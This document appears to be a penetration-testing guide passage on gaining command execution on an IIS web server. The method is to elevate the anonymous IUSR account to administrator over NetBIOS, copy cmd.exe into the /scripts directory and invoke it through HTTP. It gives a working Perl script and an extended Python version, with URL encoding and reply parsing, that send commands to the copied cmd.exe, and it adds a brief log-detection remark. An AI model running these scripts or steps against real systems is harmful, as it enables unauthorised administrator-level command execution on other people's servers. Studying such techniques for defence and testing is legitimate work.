In this situation, let us assume that port 80 is open but that no exploitable
scripts or weaknesses are to be found on the web server, while we do have
administrator rights via NetBIOS. Uploading a program is trivial: we use
NetBIOS. A simple way to execute a program is to use the NT remote user
administration tool to elevate the IUSR_<machine> account (the anonymous user
IIS runs web requests as) to administrator level. The next step is to copy
cmd.exe into the <webroot>../scripts directory and then call cmd.exe with
parameters from a browser. An easy way of doing this from the command line is
with the following Perl script:
#!/usr/bin/perl
# Sends a GET to the cmd.exe copied into /scripts and prints whatever comes back.
use strict;
use warnings;
use Socket;

die "Usage: execute IP:port command\n" if @ARGV < 2;
my ($host, $port) = split(/:/, $ARGV[0]);
my $command = $ARGV[1];
print "Executing $command on $host:$port\n";
$command =~ s/ /%20/g;    # only spaces are encoded; IIS decodes them before passing them to cmd.exe
my $target = inet_aton($host) or die "Cannot resolve $host\n";

# ---------------send the command
my @results = sendraw("GET /scripts/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;

# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {    # this saves the whole transaction anyway
    my ($pstr) = @_;
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0)
        or die "Socket problems\n";
    if (connect(S, sockaddr_in($port, $target))) {
        my @in;
        select(S); $| = 1; print $pstr;          # unbuffered write of the request
        while (<S>) { push @in, $_; }            # read until the server closes
        select(STDOUT); close(S); return @in;
    } else { die "Can't connect...\n"; }
}
# Spidermark: sensepostdata
This script simply executes the command given as the second parameter using the
copied cmd.exe in the scripts directory. IIS runs it as the anonymous web
account, so with IUSR_<machine> elevated to administrator every command
succeeds with administrator rights. Note that the script only encodes spaces;
a command containing characters with URL meaning (a literal % or +) would need
proper encoding.
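The same request, as an added Python example that is not the Perl script from the page: it drives the cmd.exe-in-/scripts execution path described above and adds what the Perl leaves out, namely URL encoding of anything other than a space and a parser for the reply. Like the page, it assumes cmd.exe already sits in the /scripts virtual directory and that IUSR_<machine> has the rights needed to run the command; the host, port, function names and the sample response are constructed for illustration.

```python
# Added example, not the page's own script.  Assumes cmd.exe has been copied to
# the /scripts virtual directory as described in the text.  Host, port and the
# sample reply below are constructed for illustration.
from __future__ import annotations

import socket
from urllib.parse import quote

SCRIPT_PATH = "/scripts/cmd.exe"   # where the page's procedure copied cmd.exe


def build_request(command: str, host: str) -> bytes:
    """Raw HTTP/1.0 GET that makes IIS run `cmd.exe /c <command>`.

    IIS hands the query string to the executable as its command line, turning
    '+' into spaces and decoding %XX escapes.  Spaces therefore go out as '+';
    every other URL-unsafe byte (backslashes, colons, '&', '|', '>', quotes)
    is percent-encoded so the command reaches cmd.exe intact.  A raw '%' or
    '+' inside the command would otherwise be consumed by the URL layer.
    """
    encoded = quote(command, safe="")        # percent-encode everything unsafe
    encoded = encoded.replace("%20", "+")    # then use '+' for spaces, as IIS expects
    return (
        f"GET {SCRIPT_PATH}?/c+{encoded} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "\r\n"
    ).encode("ascii")


def parse_response(raw: bytes) -> tuple[int | None, dict[str, str], str]:
    """Split a reply into (status, headers, body).

    A normal reply carries a status line and headers.  If the bytes do not
    start with 'HTTP/', the whole thing is treated as body so that nothing the
    program printed is lost (the Perl simply dumps everything for this reason).
    """
    if not raw.startswith(b"HTTP/"):
        return None, {}, raw.decode("latin-1")
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body.decode("latin-1")


def execute(host: str, port: int, command: str, timeout: float = 10.0) -> str:
    """Send the request and return the command's output (the reply body)."""
    raw = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(command, host))
        while chunk := s.recv(4096):     # read until the server closes
            raw += chunk
    return parse_response(raw)[2]


# Constructed reply shaped like the output of `dir` through the copied cmd.exe;
# not captured from a real server.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/4.0\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b" Volume in drive C has no label.\r\n"
    b" Directory of C:\\Inetpub\\scripts\r\n"
    b"\r\n"
    b"01/01/1999  10:00a            208,144 cmd.exe\r\n"
)


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 3:
        sys.exit("usage: execute.py IP:port command")
    target_host, target_port = sys.argv[1].split(":")
    print(execute(target_host, int(target_port), sys.argv[2]))
```

Usage is the same as the Perl script (`execute.py 10.0.0.5:80 "dir c:\"`). From the defender's side, every command run this way lands in the IIS log as a request for /scripts/cmd.exe with the command in the query string, which is an easy thing to alert on.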